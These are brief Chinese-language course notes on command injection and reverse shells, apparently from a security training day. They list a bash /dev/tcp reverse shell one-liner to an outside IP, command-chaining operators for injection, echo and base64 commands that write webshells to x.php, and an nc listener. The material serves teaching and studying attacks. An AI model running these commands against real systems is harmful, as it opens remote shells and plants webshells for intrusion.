day32_kls

课程内容

反弹shell命令解析

一个简单的反弹shell命令

1
bash -i >& /dev/tcp/192.168.2.233/2333 0>&1

bash -i交互式执行bash

>&将输出和错误重定向

0>&1将输出重定向到输入

命令执行

原因

开发装未对用户输入做严格校验,将用户可控参数拼接到了命令执行函数中,导致恶意命令被执行

危害

恶意命令被执行

挖掘

黑盒

白盒

利用

拼接符

&&,||,&,|,;

写webshell

echo "webshell" > x.php

base64写webshell

echo base64_content | base64 -d > x.php

反弹shell

受害者

bash -i >& /dev/tcp/your_ip/23333 0>&1

监听主机

nc -lvnp 23333